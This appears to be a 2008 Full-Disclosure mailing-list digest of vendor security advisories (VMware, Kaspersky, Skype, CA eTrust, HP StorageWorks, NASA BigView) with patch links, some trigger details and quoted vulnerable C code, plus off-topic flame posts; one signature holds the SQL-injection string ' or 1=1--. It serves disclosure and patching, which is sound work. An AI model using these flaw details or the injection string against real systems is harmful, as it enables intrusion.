http://kb.vmware.com/kb/1004722 VMware ESX 3.0.2 patch ESX-1004724 (tcltk) http://download3.vmware.com/software/vi/ESX-1004724.tgz md5sum: fd9a160ca7baa5fc443f2adc8120ecf7 http://kb.vmware.com/kb/1004724 VMware ESX 3.0.2 patch ESX-1004719 (unzip) http://download3.vmware.com/software/vi/ESX-1004719.tgz md5sum: f0c37b9f6be3399536d60f6c6944de82 http://kb.vmware.com/kb/1004719 VMware ESX 3.0.2 patch ESX-1004219 (krb5) http://download3.vmware.com/software/vi/ESX-1004219.tgz md5sum: 7c68279762f407a7a5ee151a650ebfd4 http://kb.vmware.com/kb/1004219 VMware ESX 3.0.1 patch ESX-1004186 (HGFS,VIX) http://download3.vmware.com/software/vi/ESX-1004186.tgz md5sum: f64389a8b97718eccefadce1a14d1198 http://kb.vmware.com/kb/1004186 VMware ESX 3.0.1 patch ESX-1004728 (authd) http://download3.vmware.com/software/vi/ESX-1004728.tgz md5sum: 1f01bb819805b855ffa2ec1040eff5ca http://kb.vmware.com/kb/1004728 VMware ESX 3.0.1 patch ESX-1004725 (VIX) http://download3.vmware.com/software/vi/ESX-1004725.tgz md5sum: 9fafb04c6d3f6959e623832f539d2dc8 http://kb.vmware.com/kb/1004725 VMware ESX 3.0.1 patch ESX-1004721 (cyrus-sasl) http://download3.vmware.com/software/vi/ESX-1004721.tgz md5sum: 48190819b0f5afddefcb8d209d12b585 http://kb.vmware.com/kb/1004721 VMware ESX 3.0.1 patch ESX-1004723 (tcltk) http://download3.vmware.com/software/vi/ESX-1004723.tgz md5sum: c34ca0a5886e0c0917a93a97c331fd7d http://kb.vmware.com/kb/1004723 VMware ESX 3.0.1 patch ESX-1004190 (unzip) http://download3.vmware.com/software/vi/ESX-1004190.tgz md5sum: 05187b9f534048c79c62741367cc0dd2 http://kb.vmware.com/kb/1004190 VMware ESX 3.0.1 patch ESX-1004189 (krb5) http://download3.vmware.com/software/vi/ESX-1004189.tgz md5sum: 21b620530b99009f469c872e73a439e8 http://kb.vmware.com/kb/1004189 VMware ESX 2.5.5 Upgrade Patch 8 http://download3.vmware.com/software/esx/esx-2.5.5-90521-upgrade.tar.gz md5sum: 392b6947fc3600ca0e8e7788cd5bbb6e http://vmware.com/support/esx25/doc/esx-255-200805-patch.html VMware ESX 2.5.4 Upgrade Patch 19 http://download3.vmware.com/software/esx/esx-2.5.4-90520-upgrade.tar.gz md5sum: 442788fd0bccb0d994c75b268bd12760 http://vmware.com/support/esx25/doc/esx-254-200805-patch.html 5. References: CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5671 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0967 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2097 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2100 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1721 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0553 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5378 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4772 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0888 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0948 6. Change log: 2008-06-04 VMSA-2008-0009 Initial release - ------------------------------------------------------------------- 7. Contact: E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Center http://www.vmware.com/security VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html Copyright 2008 VMware Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFIRs08S2KysvBH1xkRCMxFAJ0WJX76quFzCV+avwupq3Lu72UKigCfRftj CZvxoXw/sZxDCSDjVzYAhrA= =s04s -----END PGP SIGNATURE----- From labs-no-reply at idefense.com Wed Jun 4 18:00:45 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Wed, 04 Jun 2008 13:00:45 -0400 Subject: [Full-disclosure] iDefense Security Advisory 06.04.08: Kaspersky Internet Security IOCTL Stack Based Buffer Overflow Vulnerability Message-ID: <4846CA3D.8000904@idefense.com> iDefense Security Advisory 06.04.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 04, 2008 I. BACKGROUND aspersky Internet Security Suite is a combination of Kaspersky anti-virus, anti-spam, and personal firewall in one product. For more information see the vendor's website at the following URL. http://www.kaspersky.com/ II. DESCRIPTION Local exploitation of a stack-based buffer overflow in Kaspersky Lab's Internet Security could allow an attacker to execute arbitrary code in the context of the kernel. The kl1.sys kernel driver distributed with Internet Security contains a stack-based buffer overflow in the handling of IOCTL 0x800520e8. This issue is caused by a failure to properly perform bounds checks on user-supplied data that is passed to the swprintf function as a source buffer. The destination buffer in this case is a 2,000 element wide-character array. If the source buffer exceeds 2,000 characters, a buffer overflow will occur leading to the execution of arbitrary code. III. ANALYSIS Exploitation of this issue allows an attacker to execute arbitrary code within the kernel. An attacker would need local access to a vulnerable computer to exploit this vulnerability. IV. DETECTION Kasperky Lab's Internet Security version 7.0.1.325 is confirmed to be vulnerable to this issue. Previous versions are also suspected to be vulnerable. V. WORKAROUND iDefense is unaware of any workaround for this issue. VI. VENDOR RESPONSE Kaspersky Lab has addressed this vulnerability by releasing updated anti-virus definition databases. For more information, refer the their article at the following URL. http://www.kaspersky.com/technews?id=203038727 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-1518 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 03/19/2008 Initial vendor notification 03/20/2008 Initial vendor response 06/04/2008 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Tobias Klein. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Wed Jun 4 18:38:04 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Wed, 04 Jun 2008 13:38:04 -0400 Subject: [Full-disclosure] iDefense Security Advisory 06.04.08: Skype File URI Security Bypass Code Execution Vulnerability Message-ID: <4846D2FC.8010805@idefense.com> iDefense Security Advisory 06.04.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 04, 2008 I. BACKGROUND Skype is a freely available VOIP client that allows access to chat and video conference with other Skype users and traditional telephone numbers. More information is available at the vendor's site at the following URL. http://www.skype.com/ II. DESCRIPTION Remote exploitation of a security policy bypass in Skype could allow an attacker to execute arbitrary code in the context of the user. The "file:" URI handler in Skype performs checks upon the URL to verify that the link does not contain certain file extensions related to executable file formats. If the link is found to contain a blacklisted file extension, a security warning dialog is shown to the user. The following file extensions are checked and considered dangerous by Skype; .ade, .adp, .asd, .bas, .bat, .cab, .chm, .cmd, .com, .cpl, .crt, .dll, .eml, .exe, .hlp, .hta, .inf, .ins, .isp, .js. Due to improper logic when performing these checks, it is possible to bypass the security warning and execute the program. First of all, checking is performed using a case sensitive comparison. The second flaw in this check is that the blacklist fails to mention all potential executable file formats. By using at least one upper case character, or using an executable file type that is not covered in the list, an attacker can bypass the security warning. III. ANALYSIS Exploitation of this issue allows an attacker to execute arbitrary code on the targeted user's machine. An attacker would need to persuade a targeted user to click a "file:" URI pointing to a malicious executable. IV. DETECTION iDefense confirmed version 3.6.0.248 of Skype to be vulnerable. Previous versions are also suspected to be vulnerable. V. WORKAROUND iDefense is currently unaware of any effective workaround for this issue. VI. VENDOR RESPONSE Skype has addressed this vulnerability by releasing version 3.8.0.139. For more information consult their advisory at the following URL. http://www.skype.com/security/skype-sb-2008-003.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-1805 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 05/16/2008 Initial vendor notification 05/17/2008 Initial vendor response 06/04/2008 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Ismael Briones (Inkatel.com). Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From zdi-disclosures at 3com.com Wed Jun 4 18:54:53 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Wed, 4 Jun 2008 12:54:53 -0500 Subject: [Full-disclosure] ZDI-08-035: CA ETrust Secure Content Manager Gateway FTP PASV Stack Overflow Vulnerability Message-ID: ZDI-08-035: CA ETrust Secure Content Manager Gateway FTP PASV Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-035 June 4, 2008 -- CVE ID: CVE-2008-2541 -- Affected Vendors: Computer Associates -- Affected Products: Computer Associates eTrust Secure Content Manager -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6168. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Computer Associates eTrust Secure Content Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists in the HTTP Gateway service icihttp.exe running on port 8080. By specifying a overly long response to a PASV command a stack buffer can be overflowed. Successful exploitation can lead to complete system compromise under the SYSTEM context. -- Vendor Response: Computer Associates has issued an update to correct this vulnerability. More details can be found at: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177784 -- Disclosure Timeline: 2008-05-23 - Vulnerability reported to vendor 2008-06-04 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Sebastian Apelt (webmaster at buzzworld.org) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Wed Jun 4 18:55:16 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Wed, 4 Jun 2008 12:55:16 -0500 Subject: [Full-disclosure] ZDI-08-036: CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow Message-ID: ZDI-08-036: CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow http://www.zerodayinitiative.com/advisories/ZDI-08-036 June 4, 2008 -- CVE ID: CVE-2008-2541 -- Affected Vendors: Computer Associates -- Affected Products: Computer Associates eTrust Secure Content Manager -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Computer Associates eTrust Secure Content Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists in the HTTP Gateway service icihttp.exe running on port 8080. When issuing a request for a FTP service the process tries to decorate the contents of the transaction. In this particular case by specifying a overly long response to a LIST command a stack buffer can be overflowed. Successful exploitation can lead to complete system compromise under the SYSTEM context. -- Vendor Response: Computer Associates has issued an update to correct this vulnerability. More details can be found at: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177784 -- Disclosure Timeline: 2008-05-23 - Vulnerability reported to vendor 2008-06-04 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Sebastian Apelt (webmaster at buzzworld.org) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Wed Jun 4 18:54:13 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Wed, 4 Jun 2008 12:54:13 -0500 Subject: [Full-disclosure] ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing Stack Overflow Vulnerability Message-ID: ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-034 June 4, 2008 -- CVE ID: CVE-2008-1661 -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard StorageWorks -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6051. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett Packard StorageWorks Storage Mirroring. Authentication is not required to exploit this vulnerability. The specific flaw exists in the DoubleTake.exe process bound by default on TCP ports 1100, 1106 and UDP port 1105. During the handling of an encoded authentication request, the process copies the user-supplied login information into a fixed length stack buffer. Sending at least 256 bytes will trigger a stack based buffer overflow due to a vulnerable processing loop. Exploitation of this issue can result in arbitrary code execution. -- Vendor Response: Hewlett-Packard states: To resolve this vulnerability download HP StorageWorks Storage Mirroring software v4.5 Service Pack 2 (SP2) from Double-Take at the following URL: http://www.doubletake.com/products/double-take/default.aspx -- Disclosure Timeline: 2007-05-22 - Vulnerability reported to vendor 2008-06-04 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Titon of BastardLabs -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From giany007 at yahoo.com Wed Jun 4 19:15:02 2008 From: giany007 at yahoo.com (Giany) Date: Wed, 4 Jun 2008 11:15:02 -0700 (PDT) Subject: [Full-disclosure] Fwd: Comments on: Phoenix Mars Lander site hacked In-Reply-To: <4b6ee9310806040942g59ffa15t8ad84fff62c66214@mail.gmail.com> Message-ID: <282010.38051.qm@web38903.mail.mud.yahoo.com> n3td3v wrote: The day Zone-H closes shop, the day I party like a mother fo! The day you stop spamming, the day I`ll be happy! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080604/4653cf3e/attachment.html From bardiir at gmail.com Wed Jun 4 19:46:04 2008 From: bardiir at gmail.com (Bardiir) Date: Wed, 4 Jun 2008 20:46:04 +0200 Subject: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix Mars Lander site hacked In-Reply-To: <282010.38051.qm@web38903.mail.mud.yahoo.com> References: <4b6ee9310806040942g59ffa15t8ad84fff62c66214@mail.gmail.com> <282010.38051.qm@web38903.mail.mud.yahoo.com> Message-ID: <9a4ce7b20806041146x82fc4ebi2a12fa2ddb7ac678@mail.gmail.com> *sigh* I can't take it anymore... 1. Answering to Spam just makes it worse for the list. Flame the troll on his mail-address if you feel like, but please take the mailing list out of the recp. or at least mark the answer as offtopic. 2. Just block xploitable at gmail.com and everything is well... 3. Just let the troll have it's fun, eventually it will get bored someday and stop spamming. 4. Don't feed the trolls. Thanks On Wed, Jun 4, 2008 at 8:15 PM, Giany wrote: > > > *n3td3v * wrote: > > > The day Zone-H closes shop, the day I party like a mother fo! > > > The day you stop spamming, the day I`ll be happy! > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080604/a4b1df5e/attachment.html From xploitable at gmail.com Wed Jun 4 20:29:05 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 4 Jun 2008 20:29:05 +0100 Subject: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix Mars Lander site hacked In-Reply-To: <9a4ce7b20806041146x82fc4ebi2a12fa2ddb7ac678@mail.gmail.com> References: <4b6ee9310806040942g59ffa15t8ad84fff62c66214@mail.gmail.com> <282010.38051.qm@web38903.mail.mud.yahoo.com> <9a4ce7b20806041146x82fc4ebi2a12fa2ddb7ac678@mail.gmail.com> Message-ID: <4b6ee9310806041229s576ef31djcfec69bb742beaf1@mail.gmail.com> On Wed, Jun 4, 2008 at 7:46 PM, Bardiir wrote: > *sigh* I can't take it anymore... > > 1. Answering to Spam just makes it worse for the list. Flame the troll on > his mail-address if you feel like, but please take the mailing list out of > the recp. or at least mark the answer as offtopic. > 2. Just block xploitable at gmail.com and everything is well... > 3. Just let the troll have it's fun, eventually it will get bored someday > and stop spamming. > 4. Don't feed the trolls. > > Thanks I'm not a troll, i'm a serious security researcher. I was misrepresented in the media by SecurityFocus Robert Lemos who ruined my image. The findings have been post, http://smear-campaign-against-n3td3v.blogspot.com/2007/12/smear-campaign-against-n3td3v.html All the best, n3td3v From advisories at coresecurity.com Wed Jun 4 20:33:58 2008 From: advisories at coresecurity.com (CORE Security Technologies Advisories) Date: Wed, 04 Jun 2008 16:33:58 -0300 Subject: [Full-disclosure] CORE-2008-0425 - NASA BigView Stack Buffer Overflow Message-ID: <4846EE26.1010508@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ NASA BigView Stack Buffer Overflow *Advisory Information* Title: NASA BigView Stack Buffer Overflow Advisory ID: CORE-2008-0425 Advisory URL: http://www.coresecurity.com/?action=item&id=2304 Date published: 2008-06-04 Date of last update: 2008-06-03 Vendors contacted: NASA Ames Research Center Release mode: Coordinated release *Vulnerability Information* Class: Stack Overflow Remotely Exploitable: Yes (client side) Locally Exploitable: No Bugtraq ID: 29517 CVE Name: CVE-2008-2542 *Vulnerability Description* NASA BigView [1] allows for interactive panning and zooming of images of arbitrary size on desktop PCs running Linux. Using this software, one can explore (on relatively modest machines) images such as the Mars Orbiter Camera mosaic [92160x33280 pixels]. The BigView package suffers from a stack buffer overflow when parsing specially crafted (invalid) PNM input files. If successful, a malicious third party could trigger execution of arbitrary code within the context of the application, or otherwise crash the whole application. The vulnerability is caused due to the BigView package not properly checking the line length of the ascii PNM input files before copying it on a stack buffer. This can be exploited to get arbitrary code execution by opening a specially crafted file. Exploitation of the PNM overflow problem requires the user to explicitly open a malicious file. The user should refrain from opening files from untrusted third parties or accessing untrusted Web sites until the patch is applied. *Vulnerable Packages* . BigView revision 1.8. . Older BigView versions could be affected too, but they were not tested. *Non-vulnerable Packages* . Available through BigView website (since June 2nd 2008, see below). *Vendor Information, Solutions and Workarounds* The NASA BigView team has published a new version fixing this vulnerability. The tarball is available on BigView's website: http://opensource.arc.nasa.gov/project/bigview/ *Credits* This vulnerability was discovered and researched by Alfredo Ortega, from CORE IMPACT's Exploit Writing Team (EWT), Core Security Technologies. *Technical Description / Proof of Concept Code* The BigView package suffers from a stack buffer overflow when parsing specially crafted (invalid) PNM input files. If successful, a malicious third party could trigger execution of arbitrary code within the context of the application, or otherwise crash the whole application. The vulnerability resides in the following code at 'Ppm/ppm.C'. Here, the function 'getline()' reads data from a file into a buffer. This is the complete function: /----------- 418 static void getline(int fin, char* lineBuf, int len) 419 { 420 bool done=false; 421 int index=0; 422 lineBuf[index]=' '; 423 while(! done){ 424 lineBuf[index] = getOneChar(fin); 425 if( lineBuf[index]==10 ) { 426 lineBuf[index]=0; 427 done=true; 428 } 429 ++index; 430 } 431 lineBuf[index]=0; 432 } - -----------/ Clearly the function requires the length of the destination buffer, but it is never used internally. This function is used on the 'PPM::ppmHeader()' function, to read the header of the PPM file. /----------- 56 PPM::ppmHeader(string filename, PPM::Format* format, 57 int* cpp, int* bpc, 58 int* sizeX, int* sizeY, 59 int* imageOffset) 60 { 61 std::ostringstream err; 62 char magic[3],lineBuf[512],junk; 63 int res,max; . . . 115 while( junk == '#' ){ 116 getline(fin,lineBuf,512); 117 cout << "Comment:"< > During the handling of an encoded authentication request, the process > copies the user-supplied login information into a fixed length stack > buffer This one seems exactly the same vulnerability I disclosed in February 2008 and for which I wrote also a testing attack (number 7) in my doubletakedown proof-of-concept: http://aluigi.org/adv/doubletakedown-adv.txt Anyway it's an old version of Double-Take so should be not considered, in fact I mentioned that old bug in my advisory only for thoroughness but without the minimal consideration since the bug was already found and patched by the same vendor (Double-Take, not HP). --- Luigi Auriemma http://aluigi.org From Valdis.Kletnieks at vt.edu Wed Jun 4 21:09:11 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Wed, 04 Jun 2008 16:09:11 -0400 Subject: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix Mars Lander site hacked In-Reply-To: Your message of "Wed, 04 Jun 2008 20:29:05 BST." <4b6ee9310806041229s576ef31djcfec69bb742beaf1@mail.gmail.com> References: <4b6ee9310806040942g59ffa15t8ad84fff62c66214@mail.gmail.com> <282010.38051.qm@web38903.mail.mud.yahoo.com> <9a4ce7b20806041146x82fc4ebi2a12fa2ddb7ac678@mail.gmail.com> <4b6ee9310806041229s576ef31djcfec69bb742beaf1@mail.gmail.com> Message-ID: <29561.1212610151@turing-police.cc.vt.edu> On Wed, 04 Jun 2008 20:29:05 BST, n3td3v said: > I'm not a troll, i'm a serious security researcher. Which part of "blogger" makes you a "serious researcher"? http://lists.grok.org.uk/pipermail/full-disclosure/2008-April/061251.html -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080604/a6d67620/attachment.bin From shirkdog_list at hotmail.com Wed Jun 4 21:08:02 2008 From: shirkdog_list at hotmail.com (M. Shirk) Date: Wed, 4 Jun 2008 16:08:02 -0400 Subject: [Full-disclosure] ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing Stack In-Reply-To: <20080604212446.34bb1f55.aluigi@autistici.org> References: <20080604212446.34bb1f55.aluigi@autistici.org> Message-ID: I need to go to your site and take one of your other bugs so I can GET PAID!! :) Shirkdog ' or 1=1-- http://www.shirkdog.us > Date: Wed, 4 Jun 2008 21:24:46 +0100 > From: aluigi at autistici.org > To: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.uk; cert at cert.org > Subject: Re: [Full-disclosure] ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing Stack Overflow Vulnerability > > > During the handling of an encoded authentication request, the process > > copies the user-supplied login information into a fixed length stack > > buffer > > This one seems exactly the same vulnerability I disclosed in February > 2008 and for which I wrote also a testing attack (number 7) in my > doubletakedown proof-of-concept: > > http://aluigi.org/adv/doubletakedown-adv.txt > > Anyway it's an old version of Double-Take so should be not considered, > in fact I mentioned that old bug in my advisory only for thoroughness > but without the minimal consideration since the bug was already > found and patched by the same vendor (Double-Take, not HP). > > > --- > Luigi Auriemma > http://aluigi.org > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _________________________________________________________________ Instantly invite friends from Facebook and other social networks to join you on Windows Live? Messenger. https://www.invite2messenger.net/im/?source=TXT_EML_WLH_InviteFriends -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080604/92311bfb/attachment.html From James.Williams at ca.com Wed Jun 4 21:57:47 2008 From: James.Williams at ca.com (Williams, James K) Date: Wed, 4 Jun 2008 16:57:47 -0400 Subject: [Full-disclosure] CA Secure Content Manager HTTP Gateway Service FTP Request Vulnerabilities Message-ID: <649CDCB56C88AA458EFF2CBF494B620404E5ED54@USILMS12.ca.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Title: CA Secure Content Manager HTTP Gateway Service FTP Request Vulnerabilities CA Advisory Date: 2008-06-03 Reported By: Sebastian Apelt working with ZDI/TippingPoint Cody Pierce, TippingPoint DVLabs Impact: A remote attacker can cause a denial of service or execute arbitrary code. Summary: CA Secure Content Manager contains multiple vulnerabilities in the HTTP Gateway service that can allow a remote attacker to cause a denial of service condition or execute arbitrary code. CA has issued a patch to address the vulnerabilities. The vulnerabilities, CVE-2008-2541, occur due to insufficient bounds checking on certain FTP requests. An attacker can make a request that will cause the service to fail or allow the attacker to take privileged action on the system. Mitigating Factors: None Severity: CA has given these vulnerabilities a maximum risk rating of High. Affected Products: CA Secure Content Manager r8 Affected Platforms: Windows Status and Recommendation: CA has issued the following patch to address the vulnerabilities. CA Secure Content Manager r8: QO99987 How to determine if you are affected: Windows: 1. Using a registry editor, determine if the following key exists: HKEY_LOCAL_MACHINE\Software\ComputerAssociates\Hidden\PatchID\80VULNHOTFIX 2. If the key does not exist, the installation is vulnerable Workaround: None References (URLs may wrap): CA Support: http://support.ca.com/ Security Notice for CA Secure Content Manager HTTP Gateway Service https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177784 Solution Document Reference APARs: QO99987 CA Security Response Blog posting: CA Secure Content Manager HTTP Gateway Service FTP Request Vulnerabilities http://community.ca.com/blogs/casecurityresponseblog/archive/2008/06/04.asp x Reported By: Sebastian Apelt working with ZDI/TippingPoint Cody Pierce, TippingPoint DVLabs CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-036/ CA ETrust Secure Content Manager Gateway FTP PASV Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-035/ CVE References: CVE-2008-2541 - CA Secure Content Manager multiple FTP buffer overflows http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2541 OSVDB References: Pending http://osvdb.org/ Changelog for this advisory: v1.0 - Initial Release Customers who require additional information should contact CA Technical Support at http://support.ca.com. For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com. If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability 